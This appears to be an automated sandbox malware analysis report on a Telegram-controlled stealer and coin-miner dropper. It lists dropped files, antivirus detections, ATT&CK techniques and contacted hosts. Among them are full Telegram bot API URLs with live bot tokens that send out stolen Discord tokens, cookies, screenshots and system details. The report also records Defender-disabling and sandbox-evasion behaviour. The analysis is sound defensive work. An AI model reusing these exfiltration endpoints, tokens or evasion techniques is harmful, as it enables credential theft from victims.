                                  Source: Yara matchFile source: 21.0.main.exe.25eb5a30000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 21.0.main.exe.25eb5ba05b8.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000C.00000003.1905885998.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: based.exe PID: 7840, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: main.exe PID: 5064, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\ProgramData\main.exe, type: DROPPED
                                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                  Gather Victim Identity Information1
                                  Scripting
                                  Valid Accounts111
                                  Windows Management Instrumentation
                                  1
                                  Scripting
                                  1
                                  Abuse Elevation Control Mechanism
                                  41
                                  Disable or Modify Tools
                                  1
                                  OS Credential Dumping
                                  2
                                  System Time Discovery
                                  Remote Services11
                                  Archive Collected Data
                                  1
                                  Web Service
                                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                                  CredentialsDomainsDefault Accounts2
                                  Native API
                                  11
                                  DLL Side-Loading
                                  11
                                  DLL Side-Loading
                                  11
                                  Deobfuscate/Decode Files or Information
                                  1
                                  Credential API Hooking
                                  3
                                  File and Directory Discovery
                                  Remote Desktop Protocol2
                                  Data from Local System
                                  4
                                  Ingress Tool Transfer
                                  Exfiltration Over BluetoothNetwork Denial of Service
                                  Email AddressesDNS ServerDomain Accounts13
                                  Command and Scripting Interpreter
                                  11
                                  Windows Service
                                  11
                                  Windows Service
                                  1
                                  Abuse Elevation Control Mechanism
                                  1
                                  Input Capture
                                  46
                                  System Information Discovery
                                  SMB/Windows Admin Shares1
                                  Screen Capture
                                  11
                                  Encrypted Channel
                                  Automated ExfiltrationData Encrypted for Impact
                                  Employee NamesVirtual Private ServerLocal Accounts1
                                  Service Execution
                                  11
                                  Registry Run Keys / Startup Folder
                                  812
                                  Process Injection
                                  21
                                  Obfuscated Files or Information
                                  NTDS431
                                  Security Software Discovery
                                  Distributed Component Object Model1
                                  Credential API Hooking
                                  5
                                  Non-Application Layer Protocol
                                  Traffic DuplicationData Destruction
                                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
                                  Registry Run Keys / Startup Folder
                                  121
                                  Software Packing
                                  LSA Secrets3
                                  Process Discovery
                                  SSH1
                                  Input Capture
                                  6
                                  Application Layer Protocol
                                  Scheduled TransferData Encrypted for Impact
                                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                  Timestomp
                                  Cached Domain Credentials241
                                  Virtualization/Sandbox Evasion
                                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                                  DLL Side-Loading
                                  DCSync1
                                  Application Window Discovery
                                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                  File Deletion
                                  Proc Filesystem1
                                  System Network Configuration Discovery
                                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt4
                                  Rootkit
                                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron112
                                  Masquerading
                                  Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd241
                                  Virtualization/Sandbox Evasion
                                  Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task812
                                  Process Injection
                                  KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                                  Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                                  Hidden Files and Directories
                                  GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                                  Hide Legend

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
                                  • Number of created Files
                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
                                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1452142 Sample: TS-240605-Millenium1.exe Startdate: 05/06/2024 Architecture: WINDOWS Score: 100 159 api.telegram.org 2->159 161 raw.githubusercontent.com 2->161 163 2 other IPs or domains 2->163 189 Snort IDS alert for network traffic 2->189 191 Multi AV Scanner detection for domain / URL 2->191 193 Malicious sample detected (through community Yara rule) 2->193 197 29 other signatures 2->197 15 TS-240605-Millenium1.exe 13 2->15         started        19 powershell.exe 2->19         started        21 powershell.exe 2->21         started        23 cmd.exe 2->23         started        signatures3 195 Uses the Telegram API (likely for C&C communication) 159->195 process4 file5 135 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 15->135 dropped 137 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 15->137 dropped 139 C:\Users\user\AppData\Local\...\python311.dll, PE32+ 15->139 dropped 141 8 other malicious files 15->141 dropped 173 Found pyInstaller with non standard icon 15->173 25 TS-240605-Millenium1.exe 15->25         started        175 Loading BitLocker PowerShell Module 19->175 27 conhost.exe 19->27         started        29 conhost.exe 21->29         started        31 conhost.exe 23->31         started        33 sc.exe 23->33         started        35 sc.exe 23->35         started        37 3 other processes 23->37 signatures6 process7 process8 39 cmd.exe 1 25->39         started        signatures9 199 Modifies Windows Defender protection settings 39->199 201 Adds a directory exclusion to Windows Defender 39->201 203 Stops critical windows services 39->203 42 Build.exe 6 39->42         started        45 conhost.exe 39->45         started        process10 file11 115 C:\ProgramData\Microsoft\hacn.exe, PE32+ 42->115 dropped 117 C:\ProgramData\Microsoft\based.exe, PE32+ 42->117 dropped 47 hacn.exe 13 42->47         started        51 based.exe 22 42->51         started        process12 file13 143 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 47->143 dropped 145 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 47->145 dropped 147 C:\Users\user\AppData\Local\Temp\...\s.exe, PE32 47->147 dropped 155 8 other files (7 malicious) 47->155 dropped 177 Antivirus detection for dropped file 47->177 179 Multi AV Scanner detection for dropped file 47->179 181 Machine Learning detection for dropped file 47->181 53 hacn.exe 47->53         started        149 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 51->149 dropped 151 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32+ 51->151 dropped 153 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 51->153 dropped 157 16 other malicious files 51->157 dropped 183 Modifies Windows Defender protection settings 51->183 185 Adds a directory exclusion to Windows Defender 51->185 187 Removes signatures from Windows Defender 51->187 55 based.exe 7 51->55         started        signatures14 process15 dnsIp16 59 cmd.exe 1 53->59         started        61 Conhost.exe 53->61         started        169 api.telegram.org 149.154.167.220, 443, 49754, 49755 TELEGRAMRU United Kingdom 55->169 205 Found many strings related to Crypto-Wallets (likely being stolen) 55->205 207 Tries to harvest and steal browser information (history, passwords, etc) 55->207 209 Modifies Windows Defender protection settings 55->209 211 2 other signatures 55->211 63 cmd.exe 1 55->63         started        66 cmd.exe 55->66         started        68 cmd.exe 55->68         started        70 4 other processes 55->70 signatures17 process18 signatures19 72 s.exe 6 59->72         started        76 conhost.exe 59->76         started        245 Adds a directory exclusion to Windows Defender 63->245 78 powershell.exe 63->78         started        80 conhost.exe 63->80         started        247 Modifies Windows Defender protection settings 66->247 82 powershell.exe 66->82         started        84 conhost.exe 66->84         started        86 rar.exe 68->86         started        88 conhost.exe 68->88         started        90 7 other processes 70->90 process20 file21 107 C:\ProgramData\svchost.exe, PE32+ 72->107 dropped 109 C:\ProgramData\setup.exe, PE32+ 72->109 dropped 111 C:\ProgramData\main.exe, PE32 72->111 dropped 221 Drops PE files with benign system names 72->221 92 svchost.exe 72->92         started        96 setup.exe 72->96         started        98 main.exe 72->98         started        223 Loading BitLocker PowerShell Module 82->223 113 C:\Users\user\AppData\Local\Temp\wpNXr.zip, RAR 86->113 dropped 101 conhost.exe 90->101         started        signatures22 process23 dnsIp24 119 C:\Users\...\_wrappers.cp310-win_amd64.pyd, PE32+ 92->119 dropped 121 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 92->121 dropped 123 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 92->123 dropped 133 60 other files (56 malicious) 92->133 dropped 225 Antivirus detection for dropped file 92->225 227 Multi AV Scanner detection for dropped file 92->227 229 Machine Learning detection for dropped file 92->229 231 Queries Google from non browser process on port 80 92->231 103 svchost.exe 92->103         started        125 C:\Users\user\AppData\...\wxyubnjmnlae.tmp, PE32+ 96->125 dropped 127 C:\Program Filesbehaviorgraphoogle\Chrome\updater.exe, PE32+ 96->127 dropped 233 Writes to foreign memory regions 96->233 235 Modifies the context of a thread in another process (thread injection) 96->235 237 Found hidden mapped module (file has been removed from disk) 96->237 243 3 other signatures 96->243 165 raw.githubusercontent.com 185.199.109.133, 443, 49746, 49749 FASTLYUS Netherlands 98->165 167 ip-api.com 208.95.112.1, 49745, 49750, 49752 TUT-ASUS United States 98->167 129 C:\Users\user\AppData\Roaming\...\Update.exe, PE32 98->129 dropped 131 C:\Users\user\AppData\...\sqlite.interop.dll, PE32+ 98->131 dropped 239 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 98->239 241 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 98->241 file25 signatures26 process27 dnsIp28 171 www.google.com 216.58.212.132, 49748, 49757, 49775 GOOGLEUS United States 103->171 213 System process connects to network (likely due to code injection or exploit) 103->213 215 Creates autostart registry keys with suspicious names 103->215 217 Modifies the context of a thread in another process (thread injection) 103->217 219 Hides threads from debuggers 103->219 signatures29

                                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                  windows-stand
                                  SourceDetectionScannerLabelLink
                                  TS-240605-Millenium1.exe28%ReversingLabsWin64.Trojan.Generic
                                  TS-240605-Millenium1.exe36%VirustotalBrowse
                                  SourceDetectionScannerLabelLink
                                  C:\ProgramData\Microsoft\hacn.exe100%AviraTR/Drop.Agent.flqmj
                                  C:\ProgramData\setup.exe100%AviraTR/CoinMiner.lnxah
                                  C:\Program Files\Google\Chrome\updater.exe100%AviraTR/CoinMiner.lnxah
                                  C:\ProgramData\main.exe100%AviraTR/Spy.KeyLogger.kapbl
                                  C:\ProgramData\svchost.exe100%AviraTR/PSW.Agent.lninx
                                  C:\ProgramData\Microsoft\based.exe100%AviraHEUR/AGEN.1351111
                                  C:\ProgramData\Microsoft\hacn.exe100%Joe Sandbox ML
                                  C:\ProgramData\setup.exe100%Joe Sandbox ML
                                  C:\Program Files\Google\Chrome\updater.exe100%Joe Sandbox ML
                                  C:\ProgramData\main.exe100%Joe Sandbox ML
                                  C:\ProgramData\svchost.exe100%Joe Sandbox ML
                                  C:\ProgramData\Microsoft\based.exe100%Joe Sandbox ML
                                  C:\Program Files\Google\Chrome\updater.exe88%ReversingLabsWin64.Trojan.SilentCryptoMiner
                                  C:\ProgramData\Microsoft\based.exe51%ReversingLabsWin64.Trojan.Lazy
                                  C:\ProgramData\Microsoft\hacn.exe67%ReversingLabsWin64.Trojan.Generic
                                  C:\ProgramData\main.exe83%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                                  C:\ProgramData\setup.exe88%ReversingLabsWin64.Trojan.SilentCryptoMiner
                                  C:\ProgramData\svchost.exe74%ReversingLabsWin64.Trojan.Generic
                                  C:\Users\user\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI49442\VCRUNTIME140.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI49442\_brotli.cp310-win_amd64.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI49442\_bz2.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI49442\_cffi_backend.cp310-win_amd64.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI49442\_ctypes.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI49442\_decimal.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI49442\_hashlib.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI49442\_lzma.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI49442\_pytransform.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI49442\_queue.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI49442\_socket.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI49442\_ssl.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-errorhandling-l1-1-0.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-file-l1-1-0.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-file-l1-2-0.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-file-l2-1-0.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-handle-l1-1-0.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-heap-l1-1-0.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-interlocked-l1-1-0.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-libraryloader-l1-1-0.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-localization-l1-2-0.dll0%ReversingLabs
                                  No Antivirus matches
                                  SourceDetectionScannerLabelLink
                                  raw.githubusercontent.com0%VirustotalBrowse
                                  ip-api.com0%VirustotalBrowse
                                  www.google.com0%VirustotalBrowse
                                  api.telegram.org2%VirustotalBrowse
                                  fp2e7a.wpc.phicdn.net0%VirustotalBrowse
                                  SourceDetectionScannerLabelLink
                                  http://pesterbdd.com/images/Pester.png100%Sophos S4malware repository domain
                                  https://python.org/dev/peps/pep-0263/0%Avira URL Cloudsafe
                                  https://github.com/Blank-c/BlankOBF0%Avira URL Cloudsafe
                                  https://github.com/urllib3/urllib3/issues/292070%Avira URL Cloudsafe
                                  https://api.telegram.org/bot0%Avira URL Cloudsafe
                                  http://www.micom/pkiops/Docs/ry.htm00%Avira URL Cloudsafe
                                  https://tools.ietf.org/html/rfc2388#section-4.40%Avira URL Cloudsafe
                                  https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#0%Avira URL Cloudsafe
                                  https://api.telegram.org/bot1%VirustotalBrowse
                                  https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base640%Avira URL Cloudsafe
                                  https://github.com/Blank-c/BlankOBF2%VirustotalBrowse
                                  https://github.com/urllib3/urllib3/issues/292070%VirustotalBrowse
                                  https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#0%VirustotalBrowse
                                  https://python.org/dev/peps/pep-0263/0%VirustotalBrowse
                                  https://raw.githubusercontent.com/attationin/Cloud/main/Milinfo.txt0%Avira URL Cloudsafe
                                  https://api.anonfiles.com/upload0%Avira URL Cloudsafe
                                  https://raw.githubusercontent.com/moshiax/minotaur-deepweb/main/image.pngz0%Avira URL Cloudsafe
                                  https://nuget.org/nuget.exe0%Avira URL Cloudsafe
                                  https://raw.githubusercontent.com/attationin/Cloud/main/Milinfo.txt0%VirustotalBrowse
                                  https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base640%VirustotalBrowse
                                  https://tools.ietf.org/html/rfc2388#section-4.40%VirustotalBrowse
                                  https://discord.com/api/v9/users/0%Avira URL Cloudsafe
                                  http://cacerts.digicert.coz0%Avira URL Cloudsafe
                                  https://nuget.org/nuget.exe0%VirustotalBrowse
                                  http://ip-api.com0%Avira URL Cloudsafe
                                  https://api.anonfiles.com/upload1%VirustotalBrowse
                                  https://github.com/urllib3/urllib3/issues/2192#issuecomment-8218329630%Avira URL Cloudsafe
                                  https://discord.com/api/v9/users/0%VirustotalBrowse
                                  https://raw.githubusercontent.com/moshiax/minotaur-deepweb/main/image.pngz0%VirustotalBrowse
                                  http://cacerts.digi0%Avira URL Cloudsafe
                                  https://peps.python.org/pep-0205/0%Avira URL Cloudsafe
                                  https://github.com/urllib3/urllib3/issues/2192#issuecomment-8218329630%VirustotalBrowse
                                  http://ip-api.com0%VirustotalBrowse
                                  https://semver.org/0%Avira URL Cloudsafe
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%Avira URL Cloudsafe
                                  https://raw.githubusercontent.com/attationin/Cloud/main/Milinfo.txt-0%Avira URL Cloudsafe
                                  https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy0%Avira URL Cloudsafe
                                  https://peps.python.org/pep-0205/0%VirustotalBrowse
                                  https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L6880%Avira URL Cloudsafe
                                  http://pesterbdd.com/images/Pester.png0%Avira URL Cloudsafe
                                  http://schemas.xmlsoap.org/soap/encoding/0%Avira URL Cloudsafe
                                  https://raw.githubusercontent.com/attationin/Cloud/main/Milinfo.txt-0%VirustotalBrowse
                                  http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
                                  https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy0%VirustotalBrowse
                                  http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
                                  https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader0%Avira URL Cloudsafe
                                  http://pesterbdd.com/images/Pester.png11%VirustotalBrowse
                                  https://github.com/python/cpython/issues/86361.0%Avira URL Cloudsafe
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%VirustotalBrowse
                                  http://schemas.xmlsoap.org/soap/encoding/0%VirustotalBrowse
                                  https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L6880%VirustotalBrowse
                                  https://contoso.com/Icon0%Avira URL Cloudsafe
                                  https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader0%VirustotalBrowse
                                  https://httpbin.org/0%Avira URL Cloudsafe
                                  https://semver.org/0%VirustotalBrowse
                                  https://www.apache.org/licenses/0%Avira URL Cloudsafe
                                  http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%Avira URL Cloudsafe
                                  http://www.cl.cam.ac.uk/~mgk25/iso-time.html0%Avira URL Cloudsafe
                                  https://github.com/Pester/Pester0%Avira URL Cloudsafe
                                  https://www.apache.org/licenses/0%VirustotalBrowse
                                  https://contoso.com/Icon0%VirustotalBrowse
                                  http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l5350%Avira URL Cloudsafe
                                  https://github.com/python/cpython/issues/86361.0%VirustotalBrowse
                                  https://httpbin.org/1%VirustotalBrowse
                                  https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy0%Avira URL Cloudsafe
                                  http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%VirustotalBrowse
                                  https://github.com/Pester/Pester1%VirustotalBrowse
                                  https://www.python.org/psf/license/0%Avira URL Cloudsafe
                                  http://ip-api.com/line/?fields=hostingr0%Avira URL Cloudsafe
                                  http://cacerts.digicert.coCi0%Avira URL Cloudsafe
                                  https://api.anonfiles.com/uploadr0%Avira URL Cloudsafe
                                  http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l5350%VirustotalBrowse
                                  http://tools.ietf.org/html/rfc6125#section-6.4.30%Avira URL Cloudsafe
                                  https://www.python.org/psf/license/0%VirustotalBrowse
                                  http://tools.ietf.org/html/rfc6125#section-6.4.30%VirustotalBrowse
                                  http://schemas.xmlsoap.org/wsdl/0%Avira URL Cloudsafe
                                  http://cacerts.digicert0%Avira URL Cloudsafe
                                  https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy0%VirustotalBrowse
                                  https://api.telegram.org/bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendMessage?chat_id=6024388590&text=%F0%9F%92%8EDiscord%20tokens:%0A0%Avira URL Cloudsafe
                                  https://google.com/mail0%Avira URL Cloudsafe
                                  http://www.cl.cam.ac.uk/~mgk25/iso-time.html0%VirustotalBrowse
                                  https://api.telegram.org/file/bot0%Avira URL Cloudsafe
                                  http://ip-api.com/line/?fields=hostingr0%VirustotalBrowse
                                  https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py0%Avira URL Cloudsafe
                                  http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm0%Avira URL Cloudsafe
                                  https://foss.heptapod.net/pypy/pypy/-/issues/35390%Avira URL Cloudsafe
                                  https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.0%Avira URL Cloudsafe
                                  http://google.com/0%Avira URL Cloudsafe
                                  https://api.gofile.io/getServerr0%Avira URL Cloudsafe
                                  http://ocsp.sectigo.com00%Avira URL Cloudsafe
                                  https://www.python.org/download/releases/2.3/mro/.0%Avira URL Cloudsafe
                                  https://api.telegram.org/bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-10%Avira URL Cloudsafe
                                  https://contoso.com/License0%Avira URL Cloudsafe
                                  https://discordapp.com/api/v9/users/0%Avira URL Cloudsafe
                                  http://ip-api.com/json/?fields=225545r0%Avira URL Cloudsafe
                                  http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%Avira URL Cloudsafe
                                  https://github.com/urllib3/urllib3/issues/29200%Avira URL Cloudsafe
                                  https://yahoo.com/0%Avira URL Cloudsafe
                                  https://api.telegram.org/bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendMessage?chat_id=6024388590&text=%E2%9A%A1%EF%B8%8FBot%20connected:%0AUsername:%20user,%20Location:%20United%20States%20[US],%20Killeen,%20ID:%206476%0A%E2%84%B9%EF%B8%8FSend%20%22/6476*help%22%20to%20see%20the%20command%20list%0A%F0%9F%92%8EVersion:%202.80%Avira URL Cloudsafe
                                  http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-60%Avira URL Cloudsafe
                                  NameIPActiveMaliciousAntivirus DetectionReputation
                                  raw.githubusercontent.com
                                  185.199.109.133
                                  truetrueunknown
                                  ip-api.com
                                  208.95.112.1
                                  truefalseunknown
                                  www.google.com
                                  216.58.212.132
                                  truefalseunknown
                                  api.telegram.org
                                  149.154.167.220
                                  truetrueunknown
                                  fp2e7a.wpc.phicdn.net
                                  192.229.221.95
                                  truefalseunknown
                                  NameMaliciousAntivirus DetectionReputation
                                  https://raw.githubusercontent.com/attationin/Cloud/main/Milinfo.txttrue
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.telegram.org/bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendMessage?chat_id=6024388590&text=%F0%9F%92%8EDiscord%20tokens:%0Afalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.telegram.org/bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1false
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.telegram.org/bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendMessage?chat_id=6024388590&text=%E2%9A%A1%EF%B8%8FBot%20connected:%0AUsername:%20user,%20Location:%20United%20States%20[US],%20Killeen,%20ID:%206476%0A%E2%84%B9%EF%B8%8FSend%20%22/6476*help%22%20to%20see%20the%20command%20list%0A%F0%9F%92%8EVersion:%202.8false
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.telegram.org/bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendMessage?chat_id=6024388590&text=%E2%9A%A1%EF%B8%8FBot%20connected:%0AUsername:%20user,%20Location:%20United%20States%20[US],%20Killeen,%20ID:%205169%0A%E2%84%B9%EF%B8%8FSend%20%22/5169*help%22%20to%20see%20the%20command%20list%0A%F0%9F%92%8EVersion:%202.8false
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://ip-api.com/json/false
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.telegram.org/bot7006262545:AAG_Oybxah5yJgAPFw9HTnZfJtepO5xBob8/sendDocumentfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.telegram.org/bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendDocument?chat_id=6024388590&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(3.27%20kb)false
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.telegram.org/bot5358754228:AAE42HAGW1bzIPxU7iVRC_96iDuHcwSjjVo/sendDocumentfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.telegram.org/bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendDocument?chat_id=6024388590&caption=%F0%9F%93%B8Screenshot%20takenfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.telegram.org/bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendMessage?chat_id=6024388590&text=%0A%F0%9F%96%A5Computer%20info:%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AComputer%20name:%20992547%0AUser%20name:%20user%0ASystem%20time:%202024-06-04%209:56:51%20pm%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20ON2Z3HY%0ARAM:%204095%20MB%0AHWID:%20E63B102745%0A%0A%F0%9F%9B%A1Security:%0AInstalled%20antivirus:%20Windows%20Defender.%0AStarted%20as%20admin:%20Truefalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://ip-api.com/json/?fields=225545false
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.google.com/false
                                  • Avira URL Cloud: safe
                                  unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://github.com/Blank-c/BlankOBFbased.exe, 00000008.00000003.1893065874.000001EB8717D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1892158606.000001EB8717A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1892458033.000001EB87F83000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 2%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.telegram.org/botbased.exe, 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894173592.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894354019.000001EB87177000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894602665.000001EB871B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 00000013.00000002.2061867886.0000022E6DDC9000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://github.com/urllib3/urllib3/issues/29207based.exe, 00000008.00000002.2127328411.000001EB88180000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
